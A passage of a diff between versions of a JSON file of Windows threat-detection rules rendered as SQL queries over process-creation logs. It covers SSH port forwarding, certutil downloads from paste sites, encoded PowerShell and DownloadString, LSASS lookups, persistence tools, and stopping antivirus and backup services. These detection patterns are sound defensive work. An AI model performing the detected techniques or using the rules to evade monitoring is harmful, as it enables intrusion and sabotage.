delete events logs", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1572", - "attack.t1021.001", - "attack.t1021.004" + "attack.discovery", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Another tool that uses the command line switches of PsLogList", + "Legitimate use of PsLogList by an administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'psloglist.exe' OR (NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\')) AND (CommandLine LIKE '% security%' ESCAPE '\\' OR CommandLine LIKE '% application%' ESCAPE '\\' OR CommandLine LIKE '% system%' ESCAPE '\\') AND (CommandLine LIKE '% -d%' ESCAPE '\\' OR CommandLine LIKE '% /d%' ESCAPE '\\' OR CommandLine LIKE '% -x%' ESCAPE '\\' OR CommandLine LIKE '% /x%' ESCAPE '\\' OR CommandLine LIKE '% -s%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% /c%' ESCAPE '\\' OR CommandLine LIKE '% -g%' ESCAPE '\\' OR CommandLine LIKE '% /g%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ssh_port_forward.yml" + "filename": "proc_creation_win_sysinternals_psloglist.yml" }, { - "title": "Taskmgr as LOCAL_SYSTEM", - "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "title": "Suspicious Execution Of PDQDeployRunner", + "id": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", "status": "experimental", - "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": 
"Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate use of the PDQDeploy tool to execute these commands" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%PDQDeployRunner-%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\') OR (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine 
LIKE '% -encodedcommand %' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% -w hidden%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_taskmgr_localsystem.yml" + "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml" }, { - "title": "PUA - AdvancedRun Suspicious Execution", - "id": "fa00b701-44c6-4679-994d-5a18afa8a707", + "title": "PUA - AdvancedRun Execution", + "id": "d2b749ee-4225-417e-b20e-a8d2193cbb84", "status": "experimental", - "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", + "description": "Detects the execution of AdvancedRun utility", "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'AdvancedRun.exe' OR (CommandLine LIKE '% /EXEFilename %' ESCAPE '\\' AND CommandLine LIKE '% /Run%' ESCAPE '\\') OR (CommandLine LIKE '% /WindowState 0%' ESCAPE '\\' AND CommandLine LIKE '% /RunAs %' ESCAPE '\\' AND CommandLine LIKE '% /CommandLine %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" + "filename": "proc_creation_win_pua_advancedrun.yml" }, { - "title": "PowerShell Get-Process LSASS", - "id": 
"b2815d0d-7481-4bf0-9b6c-a4c48a94b349", - "status": "test", - "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", - "author": "Florian Roth (Nextron Systems)", + "title": "Mshtml DLL RunHTMLApplication Abuse", + "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", + "status": "experimental", + "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_getprocess_lsass.yml" + "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" }, { - "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", - "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", - "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CMSTP Execution Process Creation", + "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", 
"tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" + "filename": "proc_creation_win_cmstp_execution_by_creation.yml" }, { - "title": "HackTool - SharPersist Execution", - "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "title": 
"Unusual Parent Process For Cmd.EXE", + "id": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", "status": "experimental", - "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious parent process for cmd.exe", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.t1053" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ctfmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\epad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\FlashPlayerUpdateService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\GoogleUpdate.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jucheck.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR ParentProcessName LIKE 
'%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sppsvc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\unsecapp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wergmgr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WUDFHost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpersist.yml" + "filename": "proc_creation_win_cmd_unusual_parent.yml" }, { - "title": "HackTool - SharpEvtMute Execution", - "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "title": "Suspicious ScreenSave Change by Reg.exe", + "id": "0fc35fc3-efe6-4898-8a37-0b233339524f", "status": "experimental", - "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "author": "frack113", + "tags": [ + "attack.privilege_escalation", + "attack.t1546.002" + ], + "falsepositives": [ + "GPO" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop%' ESCAPE '\\' OR CommandLine LIKE '%HKCU\\\\Control Panel\\\\Desktop%' ESCAPE '\\')) AND ((CommandLine LIKE '%/v ScreenSaveActive%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 1%' ESCAPE '\\' AND 
CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaveTimeout%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaverIsSecure%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 0%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v SCRNSAVE.EXE%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%.scr%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_reg_screensaver.yml" + }, + { + "title": "ZOHO Dctask64 Process Injection", + "id": "6345b048-8441-43a7-9bed-541133633d7a", + "status": "test", + "description": "Detects suspicious process injection using ZOHO's dctask64.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpevtmute.yml" + "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" }, { - "title": "Suspicious Windows Service Tampering", - "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", + "title": "Suspicious Add Scheduled Command Pattern", + "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", "status": "experimental", - "description": "Detects the usage of binaries such 
as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects suspicious scheduled task creations with commands that are uncommon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1489" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! 
Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE 
'%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE 
'%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL 
Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR 
